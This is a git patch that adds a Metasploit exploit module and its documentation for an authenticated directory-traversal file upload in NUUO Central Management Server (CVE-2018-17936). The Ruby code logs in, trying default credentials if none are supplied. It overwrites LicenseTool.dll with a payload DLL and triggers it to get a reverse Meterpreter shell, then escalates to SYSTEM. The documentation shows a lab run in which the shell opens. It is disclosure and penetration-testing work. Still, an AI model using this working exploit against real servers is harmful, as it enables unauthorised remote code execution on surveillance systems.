From 973c7dac3278330d40f7c012e2448e0122dcc6e2 Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Wed, 20 Feb 2019 07:43:37 -0600 Subject: [PATCH] Land #11290, Add Nuuo CMS file upload exploit --- .../exploit/windows/nuuo/nuuo_cms_fu.md | 77 +++++++++++++ modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 104 ++++++++++++++++++ 2 files changed, 181 insertions(+) create mode 100644 documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md create mode 100644 modules/exploits/windows/nuuo/nuuo_cms_fu.rb diff --git a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md new file mode 100644 index 0000000000..26c0e18498 --- /dev/null +++ b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md @@ -0,0 +1,77 @@ +## Description + +Nuuo CMS Authenticated Arbitrary File Upload + +The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the CMS Server. An example is below: + +``` +COMMITCONFIG NUCM/1.0 +User-Session-No: +Filename: +FileType: +Content-Lenght: + + +``` + +The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) characters. Therefore, this function can be abused to overwrite any files in the installation drive of CMS Server. + +This vulnerability is exploitable in CMS versions up to and including v2.4. + +This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided. + +## Vulnerable Application + +[NUUO Central Management Server (CMS): all versions below 2.5](http://d1.nuuo.com/NUUO/CMS/) + + - 1.5.2 OK + - 2.1.0 OK + - 2.3.2 OK + - 2.4.0 OK + - 2.6.0 FAIL (vuln fixed?) + - 2.9.0 FAIL + - 2.10.0 FAIL + +## Scenarios + +### Testing on Windows 10 Pro x64 running NCS Server 2.4.0 + +``` +msf5 exploit(windows/nuuo/nuuo_cms_fu) > set rhosts 172.22.222.200 +rhosts => 172.22.222.200 +msf5 exploit(windows/nuuo/nuuo_cms_fu) > set verbose true +verbose => true +msf5 exploit(windows/nuuo/nuuo_cms_fu) > exploit + +[*] Started reverse TCP handler on 172.22.222.136:4444 +[*] 172.22.222.200:5180 - Backing up LicenseTool.dll to TQzixBdpOiRG +[*] 172.22.222.200:5180 - Uploading payload... +[*] 172.22.222.200:5180 - Sleeping 15 seconds... +[*] 172.22.222.200:5180 - Sending SENDLICFILE request, shell incoming! +[*] Sending stage (179779 bytes) to 172.22.222.200 +[*] Meterpreter session 3 opened (172.22.222.136:4444 -> 172.22.222.200:49674) at 2019-02-19 05:46:51 -0600 + +meterpreter > +[!] 172.22.222.200:5180 - Please wait a bit while we clean up +[+] 172.22.222.200:5180 - Successfully restored LicenseTool.dll! +...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). +[+] 172.22.222.200:5180 - We should have SYSTEM now, enjoy your shell! + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > sysinfo +Computer : DESKTOP-IPOGIJR +OS : Windows 10 (Build 17763). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x86/windows +meterpreter > +``` + +## References + +https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02 + +https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb new file mode 100644 index 0000000000..cc41127759 --- /dev/null +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -0,0 +1,104 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ManualRanking + + include Msf::Exploit::EXE + include Msf::Exploit::Remote::Nuuo + + def initialize(info={}) + super(update_info(info, + 'Name' => "Nuuo Central Management Server Authenticated Arbitrary File Upload", + 'Description' => %q{ + The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the + CMS Server. + The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) + characters. Therefore, this function can be abused to overwrite any files in the installation + drive of CMS Server. + + This vulnerability is exploitable in CMS versions up to and including v2.4. + + This module will either use a provided session number (which can be guessed with an auxiliary + module) or attempt to login using a provided username and password - it will also try the + default credentials if nothing is provided. + + This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module + fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will + not execute successfully. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module + ], + 'References' => + [ + [ 'CVE', '2018-17936' ], + [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ], + [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ], + [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ] + ], + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Targets' => + [ + [ 'Nuuo Central Management Server <= v2.4.0', {} ], + ], + 'Privileged' => true, + 'DisclosureDate' => 'Oct 11 2018', + 'DefaultTarget' => 0)) + end + + def on_new_session(client) + if client.type == 'meterpreter' + print_warning('Please wait a bit while we clean up') + client.sys.process.get_processes().each do |proc| + if proc['name'] == 'NCS_Server.exe' + client.sys.process.kill(proc['pid']) + Rex.sleep(5) + client.shell_command_token("move /y #{@dll} LicenseTool.dll") + client.sys.process.execute('NCS_Server.exe') + print_good('Successfully restored LicenseTool.dll!') + end + end + + # elevate privs to system (we're already Admin anyway), and we're done! + client.run_cmd('getsystem') + print_good('We should have SYSTEM now, enjoy your shell!') + else + print_error('You are not using meterpreter, so we are unable to restore LicenseTool.dll') + print_error("To restore it, kill the NCS_Server.exe process and copy \\#{@dll} to \\LicenseTool.dll") + print_error('... otherwise the Nuuo CMS installation will be nuked!') + print_good('Anyway, enjoy your shell!') + end + end + + def exploit + nucs_login + + unless @nucs_session + fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS') + end + + # Download and upload a backup of LicenseTool.dll, so that we can restore it at post + # and not nuke the CMS installation. + @dll = rand_text_alpha(12) + print_status("Backing up LicenseTool.dll to #{@dll}") + dll_data = nucs_download_file('LicenseTool.dll') + nucs_upload_file(@dll, dll_data) + + print_status('Uploading payload...') + nucs_upload_file('LicenseTool.dll', generate_payload_dll) + + print_status('Sleeping 15 seconds...') + Rex.sleep(15) + + print_status('Sending SENDLICFILE request, shell incoming!') + license_data = rand_text_alpha(50..350) + nucs_send_msg(['SENDLICFILE', "FileName: #{rand_text_alpha(3..11)}.lic", + 'Content-Length: ' + license_data.length.to_s], license_data) + end +end